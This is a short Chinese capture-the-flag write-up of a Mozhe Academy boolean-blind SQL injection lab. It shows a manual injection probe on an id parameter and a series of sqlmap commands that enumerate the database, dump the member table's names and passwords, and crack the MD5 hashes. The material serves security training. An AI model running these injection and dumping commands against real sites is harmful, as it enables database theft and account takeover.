墨者学院——SQL注入漏洞测试(布尔盲注)

1. 启动靶场，熟悉的界面
   

2. 点击登录下方的维护通知

3. 地址栏醒目的id出现了，尝试一下id =1’ and 1=1，空白页面
   

4. 直接开kali，上sqlmap
   输入sqlmap -u http://219.153.49.228:45239/new_list.php?id=1 --current -db
   得到数据库名称：stormgroup

5. 输入 sqlmap -u http://219.153.49.228:47334/new_list.php?id=1 -D stormgroup --tables （这里地址和上面不一样是因为 为了记录过程我又重新开了靶场，但是我懒得改地址了……）
   输出 两个表格member和notice 显然看一下member
   

6. 输入 sqlmap -u http://219.153.49.228:47334/new_list.php?id=1 -D stormgroup -T member --columns
   输出
   

7. 出现了name和password，继续获取具体信息
   输入 sqlmap -u http://219.153.49.228:47334/new_list.php?id=1 -D stormgroup -T member -C name,password --dump
   输出

8. MD5解密 第一个密码登录不成功，第二个ok
   

9. 得到KEY，完成任务！

如果对您有帮助，请不要吝惜点赞呀